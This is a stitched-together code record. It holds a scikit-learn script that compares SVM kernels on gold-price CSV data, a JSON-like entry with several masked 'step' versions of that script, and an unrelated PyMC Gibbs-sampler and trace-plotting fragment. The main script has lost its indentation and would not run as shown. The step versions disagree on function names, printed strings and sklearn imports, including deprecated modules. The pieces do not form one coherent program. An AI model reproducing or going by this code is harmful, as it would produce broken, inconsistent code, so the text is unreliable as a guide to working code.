'/home/freebirdweij/tf_works/invest/logs', help=
'Directory to put the log data.')
parser.add_argument('--fake_data', default=False, help=
'If true, uses fake data for unit testing.', action='store_true')
FLAGS, unparsed = parser.parse_known_args()
main()
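For a quick sanity check of the sigmoid sweep above without the CSV files, here is a minimal self-contained sketch on a toy dataset (an assumption: scikit-learn >= 0.20, with the bundled iris data standing in for load_csv_without_header):

from sklearn import svm
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split

# Toy stand-in for the CSV-based data loading used above.
X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
cls = svm.SVC(kernel='sigmoid', gamma=1, coef0=0)
cls.fit(X_train, y_train)
print('Score: %.2f' % cls.score(X_test, y_test))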
<|reserved_special_token_1|>
'''
Created on 2018-9-8
@author: weij
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os.path
import sys
import time
import numpy as np
from numpy import shape
from scipy import linalg
from sklearn import datasets,linear_model,svm
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
import com.freebirdweij.goldanalyse.ml.data_util as base
import matplotlib.pyplot as plt
def test_linearSVC(*data):
X_train,X_test,y_train,y_test = data
cls = svm.LinearSVC()
cls.fit(X_train, y_train)
print('Coefficients:%s,Intercept:%s'%(cls.coef_,cls.intercept_))
    print('Score:%.2f'%cls.score(X_test, y_test))
def test_SVC_linear(*data):
X_train,X_test,y_train,y_test = data
cls = svm.SVC(kernel='linear')
cls.fit(X_train, y_train)
print('Coefficients:%s,Intercept:%s'%(cls.coef_,cls.intercept_))
    print('Score:%.2f'%cls.score(X_test, y_test))
def test_SVC_poly(*data):
X_train,X_test,y_train,y_test = data
fig = plt.figure()
### test degree ###
degrees = range(1,2)
train_scores=[]
test_scores=[]
for degree in degrees:
cls = svm.SVC(kernel='poly',degree=degree)
cls.fit(X_train, y_train)
train_scores.append(cls.score(X_train, y_train))
test_scores.append(cls.score(X_test, y_test))
        print('Score:%.2f'%cls.score(X_test, y_test))
ax=fig.add_subplot(1,3,1)
ax.plot(degrees,train_scores,label="Training score ",marker='+')
ax.plot(degrees,test_scores,label="Testing score ",marker='o')
ax.set_title("SVC_poly_degree ")
ax.set_xlabel("p")
ax.set_ylabel("score")
ax.set_ylim(0,1.05)
ax.legend(loc="best",framealpha=0.5)
plt.show()
def test_SVC_rbf(*data):
X_train,X_test,y_train,y_test = data
fig = plt.figure()
### test degree ###
#gammas = range(1,2)
#train_scores=[]
#test_scores=[]
#for gamma in gammas:
cls = svm.SVC(C=1e3,kernel='rbf',gamma=0.1,probability=True)
cls.fit(X_train, y_train)
#train_scores.append(cls.score(X_train, y_train))
#test_scores.append(cls.score(X_test, y_test))
    print('Score:%.2f'%cls.score(X_test, y_test))
    print('predictions:')
print(cls.predict(X_test))
return cls.predict_proba(X_test)
#ax=fig.add_subplot(1,1,1)
#ax.plot(gammas,train_scores,label="Training score ",marker='+')
#ax.plot(gammas,test_scores,label="Testing score ",marker='o')
#ax.set_title("SVC_rbf ")
#ax.set_xlabel(r"$\gamma$")
#ax.set_ylabel("score")
#ax.set_ylim(0,1.05)
#ax.legend(loc="best",framealpha=0.5)
#plt.show()
def grid_SVC_rbf(*data):
X_train,X_test,y_train,y_test = data
fig = plt.figure()
### test degree ###
param_grid = {'C':[1e3,5e3,1e4,5e4,1e5],
'gamma':[0.0001,0.0005,0.001,0.005,0.01,0.1]}
cls = GridSearchCV(svm.SVC(kernel='rbf'),param_grid)
cls.fit(X_train, y_train)
    print('Best estimator by GridSearchCV:')
print(cls.best_estimator_)
def test_SVC_sigmoid(*data):
X_train,X_test,y_train,y_test = data
fig = plt.figure()
### test degree ###
gammas = range(1,2)
train_scores=[]
test_scores=[]
for gamma in gammas:
cls = svm.SVC(kernel='sigmoid',gamma=gamma,coef0=0)
cls.fit(X_train, y_train)
train_scores.append(cls.score(X_train, y_train))
test_scores.append(cls.score(X_test, y_test))
        print('Score:%.2f'%cls.score(X_test, y_test))
ax=fig.add_subplot(1,1,1)
ax.plot(gammas,train_scores,label="Training score ",marker='+')
ax.plot(gammas,test_scores,label="Testing score ",marker='o')
ax.set_title("SVC_sigmoid_gamma ")
ax.set_xscale("log")
ax.set_xlabel(r"$\gamma$")
ax.set_ylabel("score")
ax.set_ylim(0,1.05)
ax.legend(loc="best",framealpha=0.5)
plt.show()
def main():
DATA_TRAIN = 'train-autd365-2018-8-31-day-high100-round-select2-0split.csv'
DATA_TEST = 'test-autd365-2018-8-31-day-high100-round-select2-0split.csv'
train_datas = base.load_csv_without_header(DATA_TRAIN,target_dtype=np.int16,
features_dtype=np.float32,target_column=0)
test_datas = base.load_csv_without_header(DATA_TEST,target_dtype=np.int16,
features_dtype=np.float32,target_column=0)
    test_SVC_sigmoid(train_datas.data,test_datas.data,train_datas.target,test_datas.target)
#pro_date = test_SVC_rbf(train_datas.data,test_datas.data,train_datas.target,test_datas.target)
#dataMat = input_datas.data
#print('dataMat:-----------------------')
#print(dataMat)
#pcaData = np.dot(dataMat,eig_vect)
#reconMat = np.dot(pcaData,eig_vect.T)+mean_v #Reconstructed datas.
#print('k:-----------------------')
#print(k)
#print('pcaData:-----------------------')
#print(pcaData)
#print('reconMat:-----------------------')
#print(reconMat)
#base.write_a_dataset_to_a_csv('audt365-2018-2-21-day-class21-high100-round-test-svm.csv', pro_date)
#base.write_a_dataset_to_a_csv('hjxh365-2018-4-16-day-plus-norm-clear-pca9999-recn.csv', reconMat)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--learning_rate',
type=float,
default=0.01,
help='Initial learning rate.'
)
parser.add_argument(
'--max_steps',
type=int,
default=100000,
help='Number of steps to run trainer.'
)
parser.add_argument(
'--percentage',
type=float,
default=0.99,
help='Number of float for pca remain percentage.'
)
parser.add_argument(
'--hidden2',
type=int,
default=32,
help='Number of units in hidden layer 2.'
)
parser.add_argument(
'--batch_size',
type=int,
default=1,
help='Batch size. Must divide evenly into the dataset sizes.'
)
parser.add_argument(
'--input_data_dir',
type=str,
default='/home/freebirdweij/tf_works/invest',
help='Directory to put the input data.'
)
parser.add_argument(
'--log_dir',
type=str,
default='/home/freebirdweij/tf_works/invest/logs',
help='Directory to put the log data.'
)
parser.add_argument(
'--fake_data',
default=False,
help='If true, uses fake data for unit testing.',
action='store_true'
)
FLAGS, unparsed = parser.parse_known_args()
main()
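grid_SVC_rbf above prints only best_estimator_; a fitted GridSearchCV also exposes the winning parameters and the cross-validated score. A self-contained sketch on a toy dataset (assumptions: scikit-learn >= 0.20, iris standing in for the CSV data):

from sklearn import svm
from sklearn.datasets import load_iris
from sklearn.model_selection import GridSearchCV, train_test_split

X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
param_grid = {'C': [1e3, 5e3, 1e4], 'gamma': [0.0001, 0.001, 0.01]}
search = GridSearchCV(svm.SVC(kernel='rbf'), param_grid, cv=3)
search.fit(X_train, y_train)
print('Best estimator by GridSearchCV:')
print(search.best_estimator_)
print('Best params: %s, CV score: %.2f' % (search.best_params_, search.best_score_))
print('Held-out score: %.2f' % search.score(X_test, y_test))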
|
flexible
|
{
"blob_id": "49995e60b817e2c5a2ea7e85e4fe96ca95363cb2",
"index": 2148,
"step-1": "<mask token>\n\n\ndef test_linearSVC(*data):\n X_train, X_test, y_train, y_test = data\n cls = svm.LinearSVC()\n cls.fit(X_train, y_train)\n print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n\n\ndef test_SVC_linear(*data):\n X_train, X_test, y_train, y_test = data\n cls = svm.SVC(kernel='linear')\n cls.fit(X_train, y_train)\n print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n\n\ndef test_SVC_poly(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n degrees = range(1, 2)\n train_scores = []\n test_scores = []\n for degree in degrees:\n cls = svm.SVC(kernel='poly', degree=degree)\n cls.fit(X_train, y_train)\n train_scores.append(cls.score(X_train, y_train))\n test_scores.append(cls.score(X_test, y_test))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n ax = fig.add_subplot(1, 3, 1)\n ax.plot(degrees, train_scores, label='Training score ', marker='+')\n ax.plot(degrees, test_scores, label='Testing score ', marker='o')\n ax.set_title('SVC_poly_degree ')\n ax.set_xlabel('p')\n ax.set_ylabel('score')\n ax.set_ylim(0, 1.05)\n ax.legend(loc='best', framealpha=0.5)\n plt.show()\n\n\ndef test_SVC_rbf(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n cls = svm.SVC(C=1000.0, kernel='rbf', gamma=0.1, probability=True)\n cls.fit(X_train, y_train)\n print('Scors:%.2f' % cls.score(X_test, y_test))\n print('probability')\n print(cls.predict(X_test))\n return cls.predict_proba(X_test)\n\n\n<mask token>\n\n\ndef main():\n DATA_TRAIN = 'train-autd365-2018-8-31-day-high100-round-select2-0split.csv'\n DATA_TEST = 'test-autd365-2018-8-31-day-high100-round-select2-0split.csv'\n train_datas = base.load_csv_without_header(DATA_TRAIN, target_dtype=np.\n int16, features_dtype=np.float32, target_column=0)\n test_datas = base.load_csv_without_header(DATA_TEST, target_dtype=np.\n int16, features_dtype=np.float32, target_column=0)\n test_SVC_sigmod(train_datas.data, test_datas.data, train_datas.target,\n test_datas.target)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_linearSVC(*data):\n X_train, X_test, y_train, y_test = data\n cls = svm.LinearSVC()\n cls.fit(X_train, y_train)\n print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n\n\ndef test_SVC_linear(*data):\n X_train, X_test, y_train, y_test = data\n cls = svm.SVC(kernel='linear')\n cls.fit(X_train, y_train)\n print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n\n\ndef test_SVC_poly(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n degrees = range(1, 2)\n train_scores = []\n test_scores = []\n for degree in degrees:\n cls = svm.SVC(kernel='poly', degree=degree)\n cls.fit(X_train, y_train)\n train_scores.append(cls.score(X_train, y_train))\n test_scores.append(cls.score(X_test, y_test))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n ax = fig.add_subplot(1, 3, 1)\n ax.plot(degrees, train_scores, label='Training score ', marker='+')\n ax.plot(degrees, test_scores, label='Testing score ', marker='o')\n ax.set_title('SVC_poly_degree ')\n ax.set_xlabel('p')\n ax.set_ylabel('score')\n ax.set_ylim(0, 1.05)\n ax.legend(loc='best', framealpha=0.5)\n plt.show()\n\n\ndef test_SVC_rbf(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n cls = svm.SVC(C=1000.0, kernel='rbf', gamma=0.1, probability=True)\n cls.fit(X_train, y_train)\n print('Scors:%.2f' % cls.score(X_test, y_test))\n print('probability')\n print(cls.predict(X_test))\n return cls.predict_proba(X_test)\n\n\ndef grid_SVC_rbf(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n param_grid = {'C': [1000.0, 5000.0, 10000.0, 50000.0, 100000.0],\n 'gamma': [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.1]}\n cls = GridSearchCV(svm.SVC(kernel='rbf'), param_grid)\n cls.fit(X_train, y_train)\n print('Best estimotor by GridSearchCV:')\n print(cls.best_estimator_)\n\n\n<mask token>\n\n\ndef main():\n DATA_TRAIN = 'train-autd365-2018-8-31-day-high100-round-select2-0split.csv'\n DATA_TEST = 'test-autd365-2018-8-31-day-high100-round-select2-0split.csv'\n train_datas = base.load_csv_without_header(DATA_TRAIN, target_dtype=np.\n int16, features_dtype=np.float32, target_column=0)\n test_datas = base.load_csv_without_header(DATA_TEST, target_dtype=np.\n int16, features_dtype=np.float32, target_column=0)\n test_SVC_sigmod(train_datas.data, test_datas.data, train_datas.target,\n test_datas.target)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef test_linearSVC(*data):\n X_train, X_test, y_train, y_test = data\n cls = svm.LinearSVC()\n cls.fit(X_train, y_train)\n print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n\n\ndef test_SVC_linear(*data):\n X_train, X_test, y_train, y_test = data\n cls = svm.SVC(kernel='linear')\n cls.fit(X_train, y_train)\n print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n\n\ndef test_SVC_poly(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n degrees = range(1, 2)\n train_scores = []\n test_scores = []\n for degree in degrees:\n cls = svm.SVC(kernel='poly', degree=degree)\n cls.fit(X_train, y_train)\n train_scores.append(cls.score(X_train, y_train))\n test_scores.append(cls.score(X_test, y_test))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n ax = fig.add_subplot(1, 3, 1)\n ax.plot(degrees, train_scores, label='Training score ', marker='+')\n ax.plot(degrees, test_scores, label='Testing score ', marker='o')\n ax.set_title('SVC_poly_degree ')\n ax.set_xlabel('p')\n ax.set_ylabel('score')\n ax.set_ylim(0, 1.05)\n ax.legend(loc='best', framealpha=0.5)\n plt.show()\n\n\ndef test_SVC_rbf(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n cls = svm.SVC(C=1000.0, kernel='rbf', gamma=0.1, probability=True)\n cls.fit(X_train, y_train)\n print('Scors:%.2f' % cls.score(X_test, y_test))\n print('probability')\n print(cls.predict(X_test))\n return cls.predict_proba(X_test)\n\n\ndef grid_SVC_rbf(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n param_grid = {'C': [1000.0, 5000.0, 10000.0, 50000.0, 100000.0],\n 'gamma': [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.1]}\n cls = GridSearchCV(svm.SVC(kernel='rbf'), param_grid)\n cls.fit(X_train, y_train)\n print('Best estimotor by GridSearchCV:')\n print(cls.best_estimator_)\n\n\ndef test_SVC_sigmod(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n gammas = range(1, 2)\n train_scores = []\n test_scores = []\n for gamma in gammas:\n cls = svm.SVC(kernel='sigmoid', gamma=gamma, coef0=0)\n cls.fit(X_train, y_train)\n train_scores.append(cls.score(X_train, y_train))\n test_scores.append(cls.score(X_test, y_test))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n ax = fig.add_subplot(1, 1, 1)\n ax.plot(gammas, train_scores, label='Training score ', marker='+')\n ax.plot(gammas, test_scores, label='Testing score ', marker='o')\n ax.set_title('SVC_sigmoid_gamma ')\n ax.set_xscale('log')\n ax.set_xlabel('$\\\\gamma$')\n ax.set_ylabel('score')\n ax.set_ylim(0, 1.05)\n ax.legend(loc='best', framealpha=0.5)\n plt.show()\n\n\ndef main():\n DATA_TRAIN = 'train-autd365-2018-8-31-day-high100-round-select2-0split.csv'\n DATA_TEST = 'test-autd365-2018-8-31-day-high100-round-select2-0split.csv'\n train_datas = base.load_csv_without_header(DATA_TRAIN, target_dtype=np.\n int16, features_dtype=np.float32, target_column=0)\n test_datas = base.load_csv_without_header(DATA_TEST, target_dtype=np.\n int16, features_dtype=np.float32, target_column=0)\n test_SVC_sigmod(train_datas.data, test_datas.data, train_datas.target,\n test_datas.target)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef test_linearSVC(*data):\n X_train, X_test, y_train, y_test = data\n cls = svm.LinearSVC()\n cls.fit(X_train, y_train)\n print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n\n\ndef test_SVC_linear(*data):\n X_train, X_test, y_train, y_test = data\n cls = svm.SVC(kernel='linear')\n cls.fit(X_train, y_train)\n print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n\n\ndef test_SVC_poly(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n degrees = range(1, 2)\n train_scores = []\n test_scores = []\n for degree in degrees:\n cls = svm.SVC(kernel='poly', degree=degree)\n cls.fit(X_train, y_train)\n train_scores.append(cls.score(X_train, y_train))\n test_scores.append(cls.score(X_test, y_test))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n ax = fig.add_subplot(1, 3, 1)\n ax.plot(degrees, train_scores, label='Training score ', marker='+')\n ax.plot(degrees, test_scores, label='Testing score ', marker='o')\n ax.set_title('SVC_poly_degree ')\n ax.set_xlabel('p')\n ax.set_ylabel('score')\n ax.set_ylim(0, 1.05)\n ax.legend(loc='best', framealpha=0.5)\n plt.show()\n\n\ndef test_SVC_rbf(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n cls = svm.SVC(C=1000.0, kernel='rbf', gamma=0.1, probability=True)\n cls.fit(X_train, y_train)\n print('Scors:%.2f' % cls.score(X_test, y_test))\n print('probability')\n print(cls.predict(X_test))\n return cls.predict_proba(X_test)\n\n\ndef grid_SVC_rbf(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n param_grid = {'C': [1000.0, 5000.0, 10000.0, 50000.0, 100000.0],\n 'gamma': [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.1]}\n cls = GridSearchCV(svm.SVC(kernel='rbf'), param_grid)\n cls.fit(X_train, y_train)\n print('Best estimotor by GridSearchCV:')\n print(cls.best_estimator_)\n\n\ndef test_SVC_sigmod(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n gammas = range(1, 2)\n train_scores = []\n test_scores = []\n for gamma in gammas:\n cls = svm.SVC(kernel='sigmoid', gamma=gamma, coef0=0)\n cls.fit(X_train, y_train)\n train_scores.append(cls.score(X_train, y_train))\n test_scores.append(cls.score(X_test, y_test))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n ax = fig.add_subplot(1, 1, 1)\n ax.plot(gammas, train_scores, label='Training score ', marker='+')\n ax.plot(gammas, test_scores, label='Testing score ', marker='o')\n ax.set_title('SVC_sigmoid_gamma ')\n ax.set_xscale('log')\n ax.set_xlabel('$\\\\gamma$')\n ax.set_ylabel('score')\n ax.set_ylim(0, 1.05)\n ax.legend(loc='best', framealpha=0.5)\n plt.show()\n\n\ndef main():\n DATA_TRAIN = 'train-autd365-2018-8-31-day-high100-round-select2-0split.csv'\n DATA_TEST = 'test-autd365-2018-8-31-day-high100-round-select2-0split.csv'\n train_datas = base.load_csv_without_header(DATA_TRAIN, target_dtype=np.\n int16, features_dtype=np.float32, target_column=0)\n test_datas = base.load_csv_without_header(DATA_TEST, target_dtype=np.\n int16, features_dtype=np.float32, target_column=0)\n test_SVC_sigmod(train_datas.data, test_datas.data, train_datas.target,\n test_datas.target)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--learning_rate', type=float, default=0.01, help=\n 'Initial learning rate.')\n parser.add_argument('--max_steps', type=int, default=100000, help=\n 'Number of steps to run trainer.')\n 
parser.add_argument('--percentage', type=float, default=0.99, help=\n 'Number of float for pca remain percentage.')\n parser.add_argument('--hidden2', type=int, default=32, help=\n 'Number of units in hidden layer 2.')\n parser.add_argument('--batch_size', type=int, default=1, help=\n 'Batch size. Must divide evenly into the dataset sizes.')\n parser.add_argument('--input_data_dir', type=str, default=\n '/home/freebirdweij/tf_works/invest', help=\n 'Directory to put the input data.')\n parser.add_argument('--log_dir', type=str, default=\n '/home/freebirdweij/tf_works/invest/logs', help=\n 'Directory to put the log data.')\n parser.add_argument('--fake_data', default=False, help=\n 'If true, uses fake data for unit testing.', action='store_true')\n FLAGS, unparsed = parser.parse_known_args()\n main()\n",
"step-5": "'''\r\nCreated on 2018-9-8\r\n\r\n@author: weij\r\n'''\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport argparse\r\nimport os.path\r\nimport sys\r\nimport time\r\nimport numpy as np\r\n\r\n\r\nfrom numpy import shape\r\nfrom scipy import linalg\r\nfrom sklearn import datasets,linear_model,cross_validation,svm\r\nfrom sklearn.grid_search import GridSearchCV\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\nimport com.freebirdweij.goldanalyse.ml.data_util as base\r\nimport matplotlib.pyplot as plt\r\n\r\ndef test_linearSVC(*data):\r\n X_train,X_test,y_train,y_test = data\r\n cls = svm.LinearSVC()\r\n cls.fit(X_train, y_train)\r\n print('Coefficients:%s,Intercept:%s'%(cls.coef_,cls.intercept_))\r\n print('Scors:%.2f'%cls.score(X_test, y_test))\r\n \r\ndef test_SVC_linear(*data):\r\n X_train,X_test,y_train,y_test = data\r\n cls = svm.SVC(kernel='linear')\r\n cls.fit(X_train, y_train)\r\n print('Coefficients:%s,Intercept:%s'%(cls.coef_,cls.intercept_))\r\n print('Scors:%.2f'%cls.score(X_test, y_test))\r\n \r\ndef test_SVC_poly(*data):\r\n X_train,X_test,y_train,y_test = data\r\n fig = plt.figure()\r\n ### test degree ###\r\n degrees = range(1,2)\r\n train_scores=[]\r\n test_scores=[]\r\n for degree in degrees:\r\n cls = svm.SVC(kernel='poly',degree=degree)\r\n cls.fit(X_train, y_train)\r\n train_scores.append(cls.score(X_train, y_train))\r\n test_scores.append(cls.score(X_test, y_test))\r\n print('Scors:%.2f'%cls.score(X_test, y_test))\r\n \r\n ax=fig.add_subplot(1,3,1)\r\n ax.plot(degrees,train_scores,label=\"Training score \",marker='+')\r\n ax.plot(degrees,test_scores,label=\"Testing score \",marker='o')\r\n ax.set_title(\"SVC_poly_degree \")\r\n ax.set_xlabel(\"p\")\r\n ax.set_ylabel(\"score\")\r\n ax.set_ylim(0,1.05)\r\n ax.legend(loc=\"best\",framealpha=0.5)\r\n plt.show()\r\n \r\ndef test_SVC_rbf(*data):\r\n X_train,X_test,y_train,y_test = data\r\n fig = plt.figure()\r\n ### test degree ###\r\n #gammas = range(1,2)\r\n #train_scores=[]\r\n #test_scores=[]\r\n #for gamma in gammas:\r\n cls = svm.SVC(C=1e3,kernel='rbf',gamma=0.1,probability=True)\r\n cls.fit(X_train, y_train)\r\n #train_scores.append(cls.score(X_train, y_train))\r\n #test_scores.append(cls.score(X_test, y_test))\r\n print('Scors:%.2f'%cls.score(X_test, y_test))\r\n print('probability')\r\n print(cls.predict(X_test))\r\n return cls.predict_proba(X_test)\r\n \r\n #ax=fig.add_subplot(1,1,1)\r\n #ax.plot(gammas,train_scores,label=\"Training score \",marker='+')\r\n #ax.plot(gammas,test_scores,label=\"Testing score \",marker='o')\r\n #ax.set_title(\"SVC_rbf \")\r\n #ax.set_xlabel(r\"$\\gamma$\")\r\n #ax.set_ylabel(\"score\")\r\n #ax.set_ylim(0,1.05)\r\n #ax.legend(loc=\"best\",framealpha=0.5)\r\n #plt.show()\r\n \r\ndef grid_SVC_rbf(*data):\r\n X_train,X_test,y_train,y_test = data\r\n fig = plt.figure()\r\n ### test degree ###\r\n param_grid = {'C':[1e3,5e3,1e4,5e4,1e5],\r\n 'gamma':[0.0001,0.0005,0.001,0.005,0.01,0.1]}\r\n cls = GridSearchCV(svm.SVC(kernel='rbf'),param_grid)\r\n cls.fit(X_train, y_train)\r\n print('Best estimotor by GridSearchCV:')\r\n print(cls.best_estimator_)\r\n \r\n \r\ndef test_SVC_sigmod(*data):\r\n X_train,X_test,y_train,y_test = data\r\n fig = plt.figure()\r\n ### test degree ###\r\n gammas = range(1,2)\r\n train_scores=[]\r\n test_scores=[]\r\n for gamma in gammas:\r\n cls = svm.SVC(kernel='sigmoid',gamma=gamma,coef0=0)\r\n cls.fit(X_train, 
y_train)\r\n train_scores.append(cls.score(X_train, y_train))\r\n test_scores.append(cls.score(X_test, y_test))\r\n print('Scors:%.2f'%cls.score(X_test, y_test))\r\n \r\n ax=fig.add_subplot(1,1,1)\r\n ax.plot(gammas,train_scores,label=\"Training score \",marker='+')\r\n ax.plot(gammas,test_scores,label=\"Testing score \",marker='o')\r\n ax.set_title(\"SVC_sigmoid_gamma \")\r\n ax.set_xscale(\"log\")\r\n ax.set_xlabel(r\"$\\gamma$\")\r\n ax.set_ylabel(\"score\")\r\n ax.set_ylim(0,1.05)\r\n ax.legend(loc=\"best\",framealpha=0.5)\r\n plt.show()\r\n \r\ndef main():\r\n \r\n DATA_TRAIN = 'train-autd365-2018-8-31-day-high100-round-select2-0split.csv'\r\n DATA_TEST = 'test-autd365-2018-8-31-day-high100-round-select2-0split.csv'\r\n\r\n train_datas = base.load_csv_without_header(DATA_TRAIN,target_dtype=np.int16,\r\n features_dtype=np.float32,target_column=0)\r\n test_datas = base.load_csv_without_header(DATA_TEST,target_dtype=np.int16,\r\n features_dtype=np.float32,target_column=0)\r\n \r\n test_SVC_sigmod(train_datas.data,test_datas.data,train_datas.target,test_datas.target)\r\n #pro_date = test_SVC_rbf(train_datas.data,test_datas.data,train_datas.target,test_datas.target)\r\n \r\n #dataMat = input_datas.data\r\n #print('dataMat:-----------------------')\r\n #print(dataMat)\r\n\r\n #pcaData = np.dot(dataMat,eig_vect)\r\n #reconMat = np.dot(pcaData,eig_vect.T)+mean_v #Reconstructed datas.\r\n #print('k:-----------------------')\r\n #print(k)\r\n #print('pcaData:-----------------------')\r\n #print(pcaData)\r\n #print('reconMat:-----------------------')\r\n #print(reconMat)\r\n #base.write_a_dataset_to_a_csv('audt365-2018-2-21-day-class21-high100-round-test-svm.csv', pro_date)\r\n #base.write_a_dataset_to_a_csv('hjxh365-2018-4-16-day-plus-norm-clear-pca9999-recn.csv', reconMat)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\r\n '--learning_rate',\r\n type=float,\r\n default=0.01,\r\n help='Initial learning rate.'\r\n )\r\n parser.add_argument(\r\n '--max_steps',\r\n type=int,\r\n default=100000,\r\n help='Number of steps to run trainer.'\r\n )\r\n parser.add_argument(\r\n '--percentage',\r\n type=float,\r\n default=0.99,\r\n help='Number of float for pca remain percentage.'\r\n )\r\n parser.add_argument(\r\n '--hidden2',\r\n type=int,\r\n default=32,\r\n help='Number of units in hidden layer 2.'\r\n )\r\n parser.add_argument(\r\n '--batch_size',\r\n type=int,\r\n default=1,\r\n help='Batch size. Must divide evenly into the dataset sizes.'\r\n )\r\n parser.add_argument(\r\n '--input_data_dir',\r\n type=str,\r\n default='/home/freebirdweij/tf_works/invest',\r\n help='Directory to put the input data.'\r\n )\r\n parser.add_argument(\r\n '--log_dir',\r\n type=str,\r\n default='/home/freebirdweij/tf_works/invest/logs',\r\n help='Directory to put the log data.'\r\n )\r\n parser.add_argument(\r\n '--fake_data',\r\n default=False,\r\n help='If true, uses fake data for unit testing.',\r\n action='store_true'\r\n )\r\n\r\n FLAGS, unparsed = parser.parse_known_args()\r\n main()\r\n",
"step-ids": [
5,
6,
7,
8,
10
]
}
|
[
5,
6,
7,
8,
10
] |
<|reserved_special_token_0|>
class UniformBall(mc.Gibbs):
def __init__(self, stochastic, others, verbose=None):
self.others = others
self.conjugate = True
mc.Gibbs.__init__(self, stochastic, verbose)
def propose(self):
x_other = [X_i.value for X_i in self.others]
max_val = pl.sqrt(1.0 - pl.dot(x_other, x_other))
self.stochastic.value = mc.runiform(-max_val, max_val)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@mc.potential
def in_ball(X=X):
if X[0] ** 2 + X[1] ** 2 <= 1.0:
return 0
else:
return -pl.inf
class UniformBall(mc.Gibbs):
def __init__(self, stochastic, others, verbose=None):
self.others = others
self.conjugate = True
mc.Gibbs.__init__(self, stochastic, verbose)
def propose(self):
x_other = [X_i.value for X_i in self.others]
max_val = pl.sqrt(1.0 - pl.dot(x_other, x_other))
self.stochastic.value = mc.runiform(-max_val, max_val)
<|reserved_special_token_0|>
def plot_trace(X, scale=1.0, angle=0.0):
fig = pl.figure(figsize=(12, 4.75))
ax1 = fig.add_subplot(1, 2, 1)
t = pl.arange(0, 2 * pl.pi, 0.01)
ax1.plot(pl.cos(angle) * pl.cos(t) - pl.sin(angle) * pl.sin(t) / scale,
pl.cos(angle) * pl.sin(t) / scale + pl.sin(angle) * pl.cos(t), 'k:')
if isinstance(X, mc.Stochastic):
tr = [X.trace()[:, 0], X.trace()[:, 1]]
else:
tr = [X[0].trace(), X[1].trace()]
ax1.plot(tr[0], tr[1], 'ko-')
book_graphics.set_font()
pl.xlabel('$X_1$')
pl.ylabel('$X_2$', rotation=0)
pl.axis([-1.1, 1.1, -1.1, 1.1])
pl.text(-1, 1, '(a)', fontsize=16, va='top', ha='left')
for i in range(2):
if i == 0:
ax2 = fig.add_subplot(2, 4, 3 + 4 * i)
ax2.plot(tr[i], 'k', drawstyle='steps-mid')
else:
ax2a = fig.add_subplot(2, 4, 3 + 4 * i, sharex=ax2)
ax2a.plot(tr[i], 'k', drawstyle='steps-mid')
pl.xlabel('Sample')
pl.xticks([25, 50, 75])
pl.yticks([-0.5, 0, 0.5])
pl.ylabel('$X_%d$' % (i + 1), rotation=0)
pl.axis([-5, 105, -1.5, 1.5])
pl.text(-1, 1.25, '(%s)' % 'bc'[i], fontsize=16, va='top', ha='left')
if i == 0:
ax3 = fig.add_subplot(2, 4, 4 + 4 * i)
ax3.acorr(tr[i].reshape(100), color='k')
else:
ax3a = fig.add_subplot(2, 4, 4 + 4 * i, sharex=ax3)
ax3a.acorr(tr[i].reshape(100), color='k')
pl.xlabel('Autocorrelation')
pl.xticks([-5, 0, 5])
